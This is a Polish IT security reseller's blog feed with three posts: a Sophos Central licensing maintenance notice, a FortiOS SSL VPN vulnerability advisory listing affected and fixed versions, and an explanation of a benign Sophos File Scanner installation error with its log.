Wraz z producentem oprogramowania – firmą Sophos, pragniemy poinformować, że na sobotę 17 lutego zaplanowano prace wiążące się z czasową niedostępnością części usług. Konserwacja portalu Sophos Central Admin będzie miała wpływ m.in. na aktywację i generowanie licencji dla produktów. Operacja rozpocznie się o godzinie 14:00 UTC (15:00 CET) i planowo potrwa około 6 godzin. W jej trakcie następujące zadania związane z obsługą licencji będą niedostępne:

  • Proces generowania licencji trial przez partnerów,
  • Proces generowania licencji trial przez stronę internetową,
  • Proces generowania licencji trial przez Enterprise Dashboard,
  • Aktywacje licencji terminowych,
  • Proces generowania licencji trial w produktach,
  • Publiczne interfejsy API w Marketplace,
  • Zmiany dla licencji MSP,
  • Proces generowania licencji Rapid Response,
  • Aktywacje licencji dla Firewalli,
  • Zmiany licencji dla Firewalli w MSP,
  • Proces przypisywania dla Firewalli,
  • Proces generowania licencji trial dla Firewalli,
  • Aktywacje licencji trial dla Firewalli – ograniczone do Partner, Enterprise i Central Dashboard.

Gdy spróbujesz zrealizować powyższe zadania, zobaczysz następujący komunikat: „Our licensing systems are under maintenance. Please retry your request in a few hours.”

Okno serwisowe zaplanowane jest na 6 godzin (15:00 – 21:00).

Trzymamy kciuki, aby i tym razem wszystko poszło zgodnie z planem, a konserwacja potrwała jak najkrócej. Jednocześnie przypominamy, iż Sophos Central to platforma chmurowa, dzięki której możliwe jest zarządzanie wszystkimi elementami ochrony od Sophos z jednego, wspólnego miejsca. Dzięki temu, że jest ona darmowa, każdy klient Sophos (nie tylko posiadający rozwiązania Intercept X czy Email), może wykorzystać centralne zarządzanie m.in.: Firewallami czy Access Pointami. Konsola Sophos Central to także jedno miejsce do zbierania logów i alertów ze wszystkich produktów z portfolio producenta. Dzięki takiemu podejściu, codzienne zarządzanie rozwiązaniami producenta z Abingdon jest nie tylko szybsze, ale i łatwiejsze.

Artykuł Sophos Central Admin – konserwacja w sobotę 17 lutego pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

FortiOS – podatność w funkcjonalności VPN

Wpisy z bloga - pt., 02/09/2024 - 10:49

Wczoraj został opublikowany przez producenta komunikat dotyczący krytycznej podatności w usłudze VPN działającej w różnych wersjach systemu operacyjnego FortiOS. Pod jego kontrolą pracują znane i lubiane przez polskich administratorów urządzenia FortiGuard. Podatność daje możliwość zdalnemu, nieuwierzytelnionemu atakującemu wykonanie arbitralnego kodu lub polecenia za pomocą specjalnie spreparowanych żądań HTTP.

Rozwiązanie tymczasowe, które proponuje producent, to wyłączenie w FortiOS funkcjonalności VPN SSL (wyłączenie trybu webowego NIE stanowi rozwiązania problemu).

Uwaga: Podatność może być potencjalnie wykorzystywana w środowiskach produkcyjnych.

Poniżej przedstawiamy listę wersji FortiOS wraz z konkretnymi wariantami i informacją o ich podatności oraz rozwiązaniu.

Wersja Dotyczy Rozwiązanie

FortiOS 7.6

Niedotyczy

Niewymagane

FortiOS 7.4

7.4.0 do 7.4.2

Aktualizacja do 7.4.3 lub wyższej

FortiOS 7.2

7.2.0 do 7.2.6

Aktualizacja do 7.2.7 lub wyższej

FortiOS 7.0

7.0.0 do 7.0.13

Aktualizacja do 7.0.14 lub wyższej

FortiOS 6.4

6.4.0 do 6.4.14

Aktualizacja do 6.4.15 lub wyższej

FortiOS 6.2

6.2.0 do 6.2.15

Aktualizacja do 6.2.16 lub wyższej

FortiOS 6.0

6.0 wszystkie wersje

Migracja do poprawionej wersji

Artykuł FortiOS – podatność w funkcjonalności VPN pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Sophos Intercept X dla Windows: Błąd instalacji skanera plików Sophos

Wpisy z bloga - śr., 02/07/2024 - 11:36

Dzisiaj (tj. 07.02.2024r.) wielu klientów Sophos mogło zauważyć niepokojący komunikat dotyczący problemu z instalacją składnika Sophos File Scanner. Choć problem nie powodował negatywnych konsekwencji, to skutkował pojawieniem się wyskakującego ostrzeżenia na urządzeniu. W wyniku tego problemu, po wejściu w agenta ochrony Sophos, użytkownicy mogli zobaczyć następujące ostrzeżenia:

  • Na lokalnym interfejsie graficznym użytkownika:

  • Na karcie zdarzeń:

Plik dziennika instalacji Sophos File Scanner w lokalizacji C:\Windows\Temp\Sophos File Scanner Install Log […].txt zawiera następujące linie:

I Begin IProductSetup2::Install for Sophos File Scanner
A Constructing installer for Sophos File Scanner
A SFS already installed. Start update.
I Running: SFS Installer
I Executing step: Verify the installset is valid
W Install verification failed with error 2: Failed to load signerrep.dat
E Failed step: Verify the installset is valid, rolling back previous steps
W Failed composite step
I Execution failed: SFS Installer
E Action failed; reboot is not required
I End product setup

Produkt i środowisko

Sophos Central Windows Endpoint

Wpływ

Chociaż błąd wskazuje na niepowodzenie instalacji, jest to tylko informacja o trudnościach w ładowaniu najnowszych danych lokalnej reputacji Sophos File Scanner. W rezultacie program będzie korzystał z istniejących danych. Pomimo wyświetlanego ostrzeżenia, ochrona działa nadal w pełnym zakresie.

Producent wypuścił już poprawkę, która rozwiązuje ten problem. Zainstaluje się ona automatycznie wraz z kolejną aktualizacją. Po jej zainstalowaniu nie jest konieczne przeprowadzenie restartu urządzenia. W rezultacie poprawnej instalacji, status urządzenia w graficznym interfejsie zostanie zmieniony na „Twoje urządzenie jest chronione”.

 

Artykuł Sophos Intercept X dla Windows: Błąd instalacji skanera plików Sophos pochodzi z serwisu FirewallBlog - BLOG IT.

Kategorie: Kategoria

Dane kontaktowe

Sun Capital Sp. z o.o.
ul. Ołtaszyńska 92c/6
53-034 Wrocław

tel. +48 71 707-03-76
tel. +48 71 360-81-00

suncapital@suncapital.pl

http://www.suncapital.pl

Subskrybuj nowości

Newsletter obsługiwany przez